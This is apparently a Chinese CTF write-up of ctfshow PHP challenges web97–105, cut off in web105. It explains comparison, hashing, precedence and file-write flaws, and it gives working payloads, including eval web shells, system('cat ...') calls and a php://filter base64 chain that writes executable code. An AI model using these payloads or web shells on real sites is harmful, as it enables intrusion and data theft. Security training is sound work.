<p>本题虽然是 <code>===</code> 强比较，仍可直接用数组绕过：md5() 的参数必须是字符串，PHP 7 中传入数组只会产生 Warning 并返回 NULL，于是 <code>NULL === NULL</code> 成立，而两个不同的数组本身又满足前面的 <code>!=</code>。注意 PHP 8 中 md5(数组) 会抛出 TypeError 直接中止，此法只对 PHP 7 及更早版本有效。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a[]=1&amp;b[]=2</span><br></pre></td></tr></table></figure>

<p>如果代码先做了 <code>(string)</code> 强制转换，数组会被转成字符串 &quot;Array&quot;，两边相等，数组绕过便失效，只能利用下面的 MD5 碰撞。</p>
<p>弱碰撞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$a=(string)$a;</span><br><span class="line">$b=(string)$b;</span><br><span class="line">if(  ($a!==$b) &amp;&amp; (md5($a)==md5($b)) )&#123;</span><br><span class="line">echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">md5弱比较，为0e开头的会被识别为科学记数法，结果均为0，所以只需找两个md5后都为0e开头且0e后面均为数字的值即可。</span><br><span class="line">payload: a=QNKCDZO&amp;b=240610708</span><br></pre></td></tr></table></figure>

<p>强碰撞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$a=(string)$a;</span><br><span class="line">$b=(string)$b;</span><br><span class="line">if(  ($a!==$b) &amp;&amp; (md5($a)===md5($b)) )&#123;</span><br><span class="line">echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">这时候需要找到两个真正的md5值相同数据</span><br><span class="line"></span><br><span class="line">a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&amp;b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2</span><br></pre></td></tr></table></figure>

<h1 id="web98"><a href="#web98" class="headerlink" title="web98"></a>web98</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$_GET</span>?<span class="variable">$_GET</span>=&amp;<span class="variable">$_POST</span>:<span class="string">&#x27;flag&#x27;</span>;</span><br><span class="line"><span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>]==<span class="string">&#x27;flag&#x27;</span>?<span class="variable">$_GET</span>=&amp;<span class="variable">$_COOKIE</span>:<span class="string">&#x27;flag&#x27;</span>;</span><br><span class="line"><span class="variable">$_GET</span>[<span class="string">&#x27;flag&#x27;</span>]==<span class="string">&#x27;flag&#x27;</span>?<span class="variable">$_GET</span>=&amp;<span class="variable">$_SERVER</span>:<span class="string">&#x27;flag&#x27;</span>;</span><br><span class="line">highlight_file(<span class="variable">$_GET</span>[<span class="string">&#x27;HTTP_FLAG&#x27;</span>]==<span class="string">&#x27;flag&#x27;</span>?<span class="variable">$flag</span>:<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.php.cn/php-weizijiaocheng-383293.html">php三元运算符与if的详解</a></p>
<p><a target="_blank" rel="noopener" href="https://www.php.cn/php-notebook-172859.html">php函数的传值与传址(引用)详解</a></p>
<p>第一行 <code>$_GET?$_GET=&amp;$_POST:'flag'</code> 在 $_GET 非空时把 $_GET 变成 $_POST 的引用，之后对 $_GET 的读取实际读的都是 $_POST。因此只要 URL 上随便带一个 GET 参数，再 POST 传 HTTP_FLAG=flag 即可。注意不要 POST flag=flag，否则第二行会把 $_GET 再改成 $_COOKIE 的引用（沿这条链一直走到 $_SERVER 时，则需要在请求头里发送 <code>Flag: flag</code>，对应 $_SERVER['HTTP_FLAG']）。</p>
<h1 id="web99"><a href="#web99" class="headerlink" title="web99"></a>web99</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$allow</span> = <span class="keyword">array</span>();</span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$i</span>=<span class="number">36</span>; <span class="variable">$i</span> &lt; <span class="number">0x36d</span>; <span class="variable">$i</span>++) &#123; </span><br><span class="line">    array_push(<span class="variable">$allow</span>, rand(<span class="number">1</span>,<span class="variable">$i</span>));</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;n&#x27;</span>]) &amp;&amp; in_array(<span class="variable">$_GET</span>[<span class="string">&#x27;n&#x27;</span>], <span class="variable">$allow</span>))&#123;</span><br><span class="line">    file_put_contents(<span class="variable">$_GET</span>[<span class="string">&#x27;n&#x27;</span>], <span class="variable">$_POST</span>[<span class="string">&#x27;content&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>array_push() 函数：向数组尾部插入一个或多个元素</p>
<p>rand(min,max) 函数：返回 [min,max] 区间内的一个随机整数（不是数组），循环把每次的结果推入 $allow</p>
<p>file_put_contents() 函数：把内容写入指定文件。关键在于 in_array() 默认使用松散比较（==），PHP 7 中 <code>&quot;5.php&quot; == 5</code> 为 true，所以文件名只要以 $allow 中出现过的数字开头即可。$allow 的第一个元素是 rand(1,36)，循环共推入约 840 个值，小数字（1～36）几乎必然在其中；若 5.php 没有写成功，换一个小数字重试即可。PHP 8 中整数与非数字字符串比较不再成立，此绕过只对 PHP 7 有效；防御上应使用 <code>in_array($x, $allow, true)</code> 严格比较，并且不要让用户控制写入路径。</p>
<p>payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?n=<span class="number">5</span>.php</span><br><span class="line">content=<span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;hack&#x27;</span>]);<span class="meta">?&gt;</span></span><br><span class="line">content=<span class="meta">&lt;?php</span> system(<span class="string">&#x27;cat flag36d.php&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h1 id="web100"><a href="#web100" class="headerlink" title="web100"></a>web100</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;ctfshow.php&quot;</span>);</span><br><span class="line"><span class="comment">//flag in class ctfshow;</span></span><br><span class="line"><span class="variable">$ctfshow</span> = <span class="keyword">new</span> ctfshow();</span><br><span class="line"><span class="variable">$v1</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line"><span class="variable">$v2</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"><span class="variable">$v3</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"><span class="variable">$v0</span>=is_numeric(<span class="variable">$v1</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v2</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v3</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$v0</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;/&quot;</span>, 
<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&quot;/\;/&quot;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">            <span class="keyword">eval</span>(<span class="string">&quot;<span class="subst">$v2</span>(&#x27;ctfshow&#x27;)<span class="subst">$v3</span>&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;    </span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.jb51.net/article/42425.htm">php中OR与|| AND与&amp;&amp;的区别总结</a></p>
<p>因为赋值运算符 <code>=</code> 的优先级高于 <code>and</code>，<code>$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);</code> 实际等价于 <code>($v0=is_numeric($v1)) and ...</code>，所以 $v0 的值只由 v1 决定，v2 和 v3 完全不受 is_numeric 约束。只需给 v1 传一个数字（如 1）让 $v0 为 true 即可。</p>
<p>flag 在 $ctfshow 对象里，直接 var_dump($ctfshow) 就能打印出来；第二条 payload 则用 <code>/*</code> 和 <code>*/</code> 把固定拼接的 <code>('ctfshow')</code> 注释掉，从而执行任意函数（v2 不能含 <code>;</code>，v3 必须含 <code>;</code>，所以分号放在 v3 里）。注意第一条 payload 进入 eval 的语句是 <code>var_dump($ctfshow)('ctfshow');</code>，var_dump 返回 NULL，后面的调用会报错，但此时 flag 已经输出。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?v1=1&amp;v2=var_dump($ctfshow)&amp;v3=;</span><br><span class="line">v1=1&amp;v2=system(&quot;cat ctfshow.php&quot;)/*&amp;v3=*/;</span><br></pre></td></tr></table></figure>



<h1 id="web101"><a href="#web101" class="headerlink" title="web101"></a>web101</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;ctfshow.php&quot;</span>);</span><br><span class="line"><span class="comment">//flag in class ctfshow;</span></span><br><span class="line"><span class="variable">$ctfshow</span> = <span class="keyword">new</span> ctfshow();</span><br><span class="line"><span class="variable">$v1</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line"><span class="variable">$v2</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"><span class="variable">$v3</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"><span class="variable">$v0</span>=is_numeric(<span class="variable">$v1</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v2</span>) <span class="keyword">and</span> is_numeric(<span 
class="variable">$v3</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$v0</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\&#123;|\[|\&quot;|\&#x27;|\,|\.|\;|\?|[0-9]/&quot;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\&#123;|\[|\&quot;|\&#x27;|\,|\.|\?|[0-9]/&quot;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">            <span class="keyword">eval</span>(<span class="string">&quot;<span class="subst">$v2</span>(&#x27;ctfshow&#x27;)<span class="subst">$v3</span>&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>这里牵扯到的是一个反射类的问题</p>
<p><a target="_blank" rel="noopener" href="https://ask.dcloud.net.cn/article/631">php反射类 ReflectionClass使用例子</a></p>
<p><a target="_blank" rel="noopener" href="https://www.huaweicloud.com/articles/12460007.html">PHP的反射类ReflectionClass、ReflectionMethod使用实例</a></p>
<p><a target="_blank" rel="noopener" href="https://learnku.com/articles/7538/the-application-of-reflection-in-php">反射在 PHP 中的应用</a></p>
<p>利用new一个反射类，直接打印其信息</p>
<p><strong>payload：</strong><code>?v1=1&amp;v2=echo new ReflectionClass&amp;v3=;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class hacker&#123;</span><br><span class="line">	public $hackername = &quot;yn8rt&quot;;</span><br><span class="line">	const  yn8rt=&#x27;nb666&#x27;;</span><br><span class="line">	public  function show()&#123;</span><br><span class="line">	echo $this-&gt;name,&#x27;&lt;br&gt;&#x27;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">//有这么一个hacker类，假设我们不知道这个类是干什么用的，我们需要知道类里面的信息，这时候就需要用到ReflectionClass来对类进行反射</span><br><span class="line">//现在我可以通过反射来获取这个类中的方法，属性，常量</span><br><span class="line"></span><br><span class="line">//通过反射获取类的信息</span><br><span class="line"></span><br><span class="line">$reflection = new ReflectionClass(&#x27;hacker&#x27;);//实例化反射对象,映射hacker类的信息</span><br><span class="line">$consts = $reflection-&gt;getConstants();//获取所有常量</span><br><span class="line">$props = $reflection-&gt;getProperties();//获取所有属性</span><br><span class="line">$methods = $reflection-&gt;getMethods();//获取所有方法</span><br><span class="line">var_dump($consts);</span><br><span class="line">var_dump($props);</span><br><span class="line">var_dump($methods);</span><br><span 
class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>返回值</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">array(1) &#123;</span><br><span class="line">  [&quot;yn8rt&quot;]=&gt;</span><br><span class="line">  string(5) &quot;nb666&quot;</span><br><span class="line">&#125;</span><br><span class="line">array(1) &#123;</span><br><span class="line">  [0]=&gt;</span><br><span class="line">  &amp;object(ReflectionProperty)#2 (2) &#123;</span><br><span class="line">    [&quot;name&quot;]=&gt;</span><br><span class="line">    string(10) &quot;hackername&quot;</span><br><span class="line">    [&quot;class&quot;]=&gt;</span><br><span class="line">    string(6) &quot;hacker&quot;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">array(1) &#123;</span><br><span class="line">  [0]=&gt;</span><br><span class="line">  &amp;object(ReflectionMethod)#3 (2) &#123;</span><br><span class="line">    [&quot;name&quot;]=&gt;</span><br><span class="line">    string(4) &quot;show&quot;</span><br><span class="line">    [&quot;class&quot;]=&gt;</span><br><span class="line">    string(6) &quot;hacker&quot;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span 
class="line"></span><br></pre></td></tr></table></figure>

<p>如果不调用具体方法而是直接 echo 反射对象，ReflectionClass::__toString() 会像题目中那样输出类的完整描述，包括：</p>
<p>1.常量 Constants<br>2.属性 Property Names<br>3.方法 Method Names<br>4.静态属性 Static Properties<br>5.命名空间 Namespace<br>6.该类是否为 final 或 abstract<br>7.该类是否有某个方法</p>
<h1 id="web102"><a href="#web102" class="headerlink" title="web102"></a>web102</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$v1</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line"><span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"><span class="variable">$v3</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"><span class="variable">$v4</span> = is_numeric(<span class="variable">$v2</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v3</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$v4</span>)&#123;</span><br><span class="line">    <span class="variable">$s</span> = substr(<span class="variable">$v2</span>,<span class="number">2</span>);<span class="comment">// 这里的意思是从第二位开始截取</span></span><br><span class="line">    <span class="variable">$str</span> = call_user_func(<span class="variable">$v1</span>,<span class="variable">$s</span>);<span class="comment">// 回调函数，第一个参数为调用的函数，其余的为调用参数的值</span></span><br><span class="line">    <span class="keyword">echo</span> <span 
class="variable">$str</span>;</span><br><span class="line">    file_put_contents(<span class="variable">$v3</span>,<span class="variable">$str</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;hacker&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-string-substr.html">PHP substr() 函数</a></p>
<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-string-hex2bin.html">PHP hex2bin() 函数</a>：参数只有一个，将传入的参数(16进制转换为ascii字符)</p>
<p>首先还是赋值与 and 的优先级问题：<code>$v4 = is_numeric($v2) and is_numeric($v3)</code> 等价于 <code>($v4 = is_numeric($v2)) and ...</code>，所以只需保证 v2 能通过 is_numeric，v3 可以是任意文件名甚至伪协议；然后利用 call_user_func 把 v2 去掉前两位后的内容交给任意单参数函数处理，再把结果写入 v3 指定的文件。</p>
<p>所以就可以这么利用啊：</p>
<p>post:v1=hex2bin</p>
<p>get：?v2=0x3c3f706870206576616c28245f504f53545b27796e275d293b3f3e&amp;v3=yn.php</p>
<p>上面的 16 进制解码为 ascii：<code>&lt;?php eval($_POST['yn']);?&gt;</code></p>
<p>但是有个什么问题：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">var_dump(is_numeric(&quot;0x66&quot;));// 在php5中返回值为true</span><br><span class="line">var_dump(is_numeric(&quot;0x66&quot;));// 在php7中返回值为false</span><br></pre></td></tr></table></figure>

<p>本题环境是 PHP 7，is_numeric 不再接受 0x 开头的十六进制字符串，所以上面的 payload 无法通过检查。</p>
<p><strong>方法二</strong></p>
<p>利用<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=base64&spm=1001.2101.3001.7020">base64</a>配合 php://filter 伪协议写入。v2 仍需通过 is_numeric，而 is_numeric 接受科学计数法，所以只要 hex 串中恰好含有一个字母 <code>e</code>、其余全是数字，整个字符串就会被当成一个（溢出的）浮点数而通过检查。下面来自同一系列 writeup 的 payload 正好满足这一条件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$a=&#x27;&lt;?=`cat *`;&#x27;;</span><br><span class="line">$b=base64_encode($a);  // PD89YGNhdCAqYDs=</span><br><span class="line">$c=bin2hex($b);      //这里直接用去掉=的base64</span><br><span class="line">输出   5044383959474e6864434171594473</span><br><span class="line"></span><br><span class="line">带e的话会被认为是科学计数法，可以通过is_numeric检测。</span><br><span class="line">大家可以尝试下去掉=和带着=的base64解码出来的内容是相同的。因为等号在base64中只是起到填充的作用，不影响具体的数据内容。</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?v2=115044383959474e6864434171594473&amp;v3=php://filter/write=convert.base64-decode/resource=1.php</span><br></pre></td></tr></table></figure>

<p>post：v1=hex2bin</p>
<p>v2 前面补的 11 只是为了让 substr($v2,2) 把它截掉；剩下的 hex 经 hex2bin 得到 base64 串，再由 php://filter 的 convert.base64-decode 解码成 <code>&lt;?=`cat *`;</code> 写入 1.php。然后访问 1.php 触发执行即可得到 flag。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfshow&#123;98ff0fa4-7a07-4277-b7da-b20802f852ca&#125;</span><br></pre></td></tr></table></figure>

<h1 id="web103"><a href="#web103" class="headerlink" title="web103"></a>web103</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$v1</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line"><span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line"><span class="variable">$v3</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"><span class="variable">$v4</span> = is_numeric(<span class="variable">$v2</span>) <span class="keyword">and</span> is_numeric(<span class="variable">$v3</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$v4</span>)&#123;</span><br><span class="line">    <span class="variable">$s</span> = substr(<span class="variable">$v2</span>,<span class="number">2</span>);</span><br><span class="line">    <span class="variable">$str</span> = call_user_func(<span class="variable">$v1</span>,<span class="variable">$s</span>);</span><br><span class="line">    <span 
class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/.*p.*h.*p.*/i&quot;</span>,<span class="variable">$str</span>))&#123;</span><br><span class="line">        file_put_contents(<span class="variable">$v3</span>,<span class="variable">$str</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;Sorry&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;hacker&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>比上一题多了一个对 $str 的 <code>/.*p.*h.*p.*/i</code> 过滤，目的是不让写入的内容里出现 php。但该检查作用于 hex2bin 之后的中间结果（即 base64 串 PD89YGNhdCAqYDs），真正解码成 <code>&lt;?=`cat *`;</code> 发生在 php://filter 写入时，检查根本看不到最终内容，所以上一题的 payload 原样可用。</p>
<h1 id="web104-106"><a href="#web104-106" class="headerlink" title="web104 106"></a>web104 106</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(sha1(<span class="variable">$v1</span>)==sha1(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span 
class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.sha1.php">sha1函数</a></p>
<p>sha1() 同样只接受字符串，没有强制类型转换时，PHP 7 中传入数组会返回 NULL（PHP 8 则抛出 TypeError），<code>NULL == NULL</code> 成立，因此可以直接数组绕过；两个不同的数组本身并不相等，所以即使题目额外要求两值不同也同样适用。另外 web104 的代码并没有要求 v1 != v2，直接让 v1 和 v2 传同一个字符串也能通过。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload：</span><br><span class="line">GET：?v2[]=1</span><br><span class="line">POST：v1[]=2</span><br></pre></td></tr></table></figure>





<h1 id="web105"><a href="#web105" class="headerlink" title="web105"></a>web105</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="variable">$error</span>=<span class="string">&#x27;你还想要flag嘛？&#x27;</span>;</span><br><span class="line"><span class="variable">$suces</span>=<span class="string">&#x27;既然你想要那给你吧！&#x27;</span>;</span><br><span class="line"><span class="keyword">foreach</span>(<span class="variable">$_GET</span> <span class="keyword">as</span> <span class="variable">$key</span> 